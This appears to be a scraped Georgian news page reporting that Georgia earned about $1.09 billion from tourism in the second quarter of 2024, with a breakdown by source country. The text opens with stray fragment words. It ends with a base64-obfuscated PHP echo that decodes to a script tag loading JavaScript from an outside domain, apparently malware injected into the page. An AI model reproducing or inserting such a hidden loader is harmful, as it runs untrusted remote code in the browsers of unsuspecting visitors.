celsiusi
ავერსი შნაიდერი

 II კვარტალში საქართველომ ტურიზმიდან 1 მილიარდ 91 მილიონი დოლარის შემოსავალი მიიღო, რაც გასული წლის ანალოგიური პერიოდის მაჩვენებელს 8%-ით აღემატება. პანდემიამდელი 2019 წლის მონაცემებთან შედარებით კი ზრდა 24%-ია. საერთაშორისო მოგზაურობიდან მიღებული შემოსავლების შესახებ მონაცემები ეროვნულმა ბანკმა გამოაქვეყნა.

II კვარტალში საქართველომ ყველაზე მეტი, 209 მილიონი დოლარის შემოსავალი რუსეთიდან მიიღო. ევროკავშირის ქვეყნებიდან და გაერთიანებული სამეფოდან კი ჯამურად 138 მილიონი დოლარი შემოვიდა.

უფრო დეტალურად, 2024 წლის აპრილ-ივნისში ტურიზმიდან მიღებული შემოსავლები ქვეყნების მიხედვით ასე ნაწილდება:

  • რუსეთი - $209 მლნ;
  • თურქეთი - $169.6 მლნ;
  • ევროკავშირის ქვეყნები და გაერთიანებული სამეფო - $138 მლნ
  • ისრაელი - $109.7 მლნ;
  • აზერბაიჯანი - $37.9 მლნ;
  • უკრაინა - $36 მლნ;
  • სომხეთი - $32.8 მლნ;
  • ირანი - $34.7 მლნ;
  • ბელარუსი - $22.4 მლნ;
  • საუდის არაბეთი - $24.9 მლნ;
  • დანარჩენი ქვეყნები - $275.8 მლნ.

 

292
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");